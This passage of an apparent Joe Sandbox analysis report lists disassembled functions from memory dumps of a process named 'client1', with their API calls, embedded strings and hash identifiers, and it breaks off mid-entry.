                                                    Function 00007FFBAB497A90 Relevance: 15.1, APIs: 10, Instructions: 72threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: acc77d8fae5fb38cfc5f211597638600039f1ca8324b1c8e61e62cff5070e8e8
                                                    • Instruction ID: 327e7bb141525bff48f7bc5a79bdd6f5eab1526651c3e44871516b97b5bf92b8
                                                    • Opcode Fuzzy Hash: acc77d8fae5fb38cfc5f211597638600039f1ca8324b1c8e61e62cff5070e8e8
                                                    • Instruction Fuzzy Hash: 0B31DBB2A0AA0281E7568F75D59837C63A4EF45FBDF198334CE3A022F5CF6D94858300
                                                    Function 00007FF79F630228 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction ID: 3ec97ae38e25c2ae4738682ddf7c8afc54605f162cdf39b16da1d5dd63216689
                                                    • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction Fuzzy Hash: 3A129661E0C3C396FB30BA24E1542FEF69BEB80758FD44035D6A9465C9DBBCE5488B60
                                                    Function 00007FFBAB4982F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$DivideNumber_SubtypeTrueType_
                                                    • String ID: float$ratio
                                                    • API String ID: 2782116801-972954435
                                                    • Opcode ID: 4831a3dffaef211fbe30ebf8b367fcef31285f64da05e03ef7d76df15abe5e82
                                                    • Instruction ID: 87af68b0ce889a9b49e9fe2a674cf8e7685d5b3d09c907c43cafb120554cc2dc
                                                    • Opcode Fuzzy Hash: 4831a3dffaef211fbe30ebf8b367fcef31285f64da05e03ef7d76df15abe5e82
                                                    • Instruction Fuzzy Hash: 9D41B8A1E4BA1281FA268B36E58423D63A0EF45BE4F088135DE7D07BF4DF2DE4558301
                                                    Function 00007FF79F626FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                    • String ID: CreateProcessW$Error creating child process!
                                                    • API String ID: 2895956056-3524285272
                                                    • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction ID: d380c7af5ec119b0fcd4c139edf9bb9be3613d7e6ca27189c727d82b26037fa6
                                                    • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                    • Instruction Fuzzy Hash: 2141F032A087C281DA20BB70E8552EAE3A9FB95364F900735E6BD47AD5DF7CD0548B50
                                                    Function 00007FFBAB494820 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_$DeallocErr_Object$ArgsAttrCallInstance
                                                    • String ID: ratio
                                                    • API String ID: 2838319001-4234197119
                                                    • Opcode ID: e50460fa4b39084320fee5246d3b49e5819d27571d8f2140336073f1f100eac0
                                                    • Instruction ID: a1677c7c0a53864dd6dc2752104728c8abbf8f8e0839a5dca493f20820d67690
                                                    • Opcode Fuzzy Hash: e50460fa4b39084320fee5246d3b49e5819d27571d8f2140336073f1f100eac0
                                                    • Instruction Fuzzy Hash: 8F1115E1A0BA0385EA5A9B7BE99453C63A0AF48BD0F08D139CC2E57374EF2CE4558311
                                                    Function 00007FFBAA6FE310 Relevance: 13.6, APIs: 9, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FreeMem_$SubtypeType_$ContextObject_Var_
                                                    • String ID:
                                                    • API String ID: 2752330588-0
                                                    • Opcode ID: e7f4ca843fc1fc5100b4f91760ec1170ac95024235bc5740df5f1bd4fe44d974
                                                    • Instruction ID: e86eb9662184adae16c74a90496a726e33f20825b5a12516c5da5b9cf20d7e6a
                                                    • Opcode Fuzzy Hash: e7f4ca843fc1fc5100b4f91760ec1170ac95024235bc5740df5f1bd4fe44d974
                                                    • Instruction Fuzzy Hash: 605163B1A0AA43C5EA168F3AD85417E6B98AF45F90F0850B6DE4D067A0DF3CE54B8721
                                                    Function 00007FFBAB494AA0 Relevance: 13.6, APIs: 9, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    • API String ID: 227901110-0
                                                    • Opcode ID: 3eece61ab72cf83c1d2f612cf55ea204bf08e9b005993bf916930f8e855fefe8
                                                    • Instruction ID: 3b528b72adfd9153db3ed582075b7a557fbcecd9a0b5a595cea3e5331e5d53f5
                                                    • Opcode Fuzzy Hash: 3eece61ab72cf83c1d2f612cf55ea204bf08e9b005993bf916930f8e855fefe8
                                                    • Instruction Fuzzy Hash: 8A31BCB6A0A60281EB668F76E59833C63A4EF54FB9F158334CE7D026E4CF6DD445C280
                                                    Function 00007FF79F62DC30 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction ID: d469534b6d766c56f50ee888696afe158bf8c955f0a15cc318a51780828034a7
                                                    • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction Fuzzy Hash: 5BE1B372A0878186EB30AF35D8402EDB7A9FB54798F900535EE9D87B95CF38E091C752
                                                    Function 00007FFBAB492E90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Ready
                                                    • String ID: Python int too large to convert to C ssize_t$string index out of range
                                                    • API String ID: 628428347-644864186
                                                    • Opcode ID: 89e2e0a892146912667459ae49694ad36895116c94b753a451ed664a490ebf80
                                                    • Instruction ID: 9bc066825c5de2fa940b9c2f18f85295f84ccf81e42c86668cb32e11a4becfa7
                                                    • Opcode Fuzzy Hash: 89e2e0a892146912667459ae49694ad36895116c94b753a451ed664a490ebf80
                                                    • Instruction Fuzzy Hash: 4E5196E2B1A60182EF568B2AE0D01BD2350FF98B94F889135DF2E437E9DE2DD495C704
                                                    Function 00007FFBAA7316E0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
                                                    • String ID: a unicode character$argument$category
                                                    • API String ID: 2803103377-2068800536
                                                    • Opcode ID: c9d1e3034f28ed3d090bffcd2b1c2b74113939870b399ed50bdb72791e912429
                                                    • Instruction ID: e20014fc9e3e0c7b690a10d132a2da58d184e88ce34cc1da38d4e739e1c2c3e0
                                                    • Opcode Fuzzy Hash: c9d1e3034f28ed3d090bffcd2b1c2b74113939870b399ed50bdb72791e912429
                                                    • Instruction Fuzzy Hash: 765129E1B0AA46C1EF169F29D4502BA23A9EB44B94F0A4075DE4F47794DF3CE846C334
                                                    Function 00007FF79F63DDB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,000001692C638C68,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF34
                                                    • GetProcAddress.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,000001692C638C68,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction ID: c546f838c425362f3399e95c05d1f801b7d962b554382e889ded803afc47e86f
                                                    • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction Fuzzy Hash: AF412321B19B9681FA32BB32AC005F5A69BBF14BA0F894235DD2D47788DE7CF405C220
                                                    Function 00007FFBAA709058 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFBAA6FE780: PyContextVar_Get.PYTHON311(?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA6FE792
                                                    • PyArg_ParseTupleAndKeywords.PYTHON311 ref: 00007FFBAA709124
                                                    • _PyObject_New.PYTHON311 ref: 00007FFBAA70914E
                                                      • Part of subcall function 00007FFBAA709224: PyObject_CallObject.PYTHON311(?,?,?,00007FFBAA708D84,?,?,?,00007FFBAA6FE7B4,?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA709236
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709552
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7095BC
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7095ED
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709618
                                                      • Part of subcall function 00007FFBAA709530: PyLong_AsSsize_t.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA709644
                                                      • Part of subcall function 00007FFBAA709530: PyList_Size.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7096BF
                                                      • Part of subcall function 00007FFBAA709530: PyList_GetItem.PYTHON311(?,00000001,?,00007FFBAA7091C1), ref: 00007FFBAA7096D9
                                                    • PyErr_SetString.PYTHON311 ref: 00007FFBAA709206
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA709217
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA715AB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Long_Ssize_t$DeallocList_Object_$Arg_CallContextErr_ItemKeywordsObjectParseSizeStringTupleVar_
                                                    • String ID: optional argument must be a context$|OOOOOOOOO
                                                    • API String ID: 3005893858-3543545731
                                                    • Opcode ID: 20bfc773aaa9baadce4829a30318245846150dfbfc53dc953c256facbe83290d
                                                    • Instruction ID: a8098e27343b4e030ffe19f0cd77906ad72efccfc20bc4b93bac7e6f595e92cd
                                                    • Opcode Fuzzy Hash: 20bfc773aaa9baadce4829a30318245846150dfbfc53dc953c256facbe83290d
                                                    • Instruction Fuzzy Hash: 76512C7660BF41D8DB518F31E8802AA33E8FB48788B140176EE4D43B68EF39D566C360
                                                    Function 00007FFBAA731590 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Unicode_$Arg_ArgumentFromReadyStringSubtypeType_
                                                    • String ID: a unicode character$argument$bidirectional
                                                    • API String ID: 2803103377-2110215792
                                                    • Opcode ID: 79e1f8ae2df2e93481f857dbc231cf2a034c20faf15badcceea9109bcd0af3e1
                                                    • Instruction ID: 2275772b04e154faeb5e6fafb45d682edb3b5200b540c761118778ae912342f6
                                                    • Opcode Fuzzy Hash: 79e1f8ae2df2e93481f857dbc231cf2a034c20faf15badcceea9109bcd0af3e1
                                                    • Instruction Fuzzy Hash: AD41F4E1B0A642C2EB669F3AD46427B23A9EB44B44F5A4175DF4E43294DF2CE842C330
                                                    Function 00007FFBAA6FD3B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _PyObject_New.PYTHON311(?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD3DB
                                                      • Part of subcall function 00007FFBAA6FD550: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD654
                                                      • Part of subcall function 00007FFBAA6FD550: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD687
                                                      • Part of subcall function 00007FFBAA6FD550: strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD69F
                                                      • Part of subcall function 00007FFBAA6FD550: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBAA6FCA18), ref: 00007FFBAA6FD6A8
                                                    • PyErr_SetObject.PYTHON311 ref: 00007FFBAA6FD4ED
                                                    • _Py_Dealloc.PYTHON311 ref: 00007FFBAA6FD506
                                                    • PyErr_SetString.PYTHON311 ref: 00007FFBAA71388E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err__errno$DeallocObjectObject_Stringisdigitstrtoll
                                                    • String ID: internal error in flags_as_exception
                                                    • API String ID: 2528243369-882050087
                                                    • Opcode ID: 2024769f93f09b39f1195a023df791e52d7bef74684774e22054ac2402435ec6
                                                    • Instruction ID: 279f13c627e511cf91883529a0e8f1eb3c61faae99fcaea3d826edaee253a1c2
                                                    • Opcode Fuzzy Hash: 2024769f93f09b39f1195a023df791e52d7bef74684774e22054ac2402435ec6
                                                    • Instruction Fuzzy Hash: E9417FB2A0A642C2E7128F39E44027E77A8FB84B58F144176DE4D037A4DF3CE44ACB60
                                                    Function 00007FF79F627600 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F62769F
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F6276EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
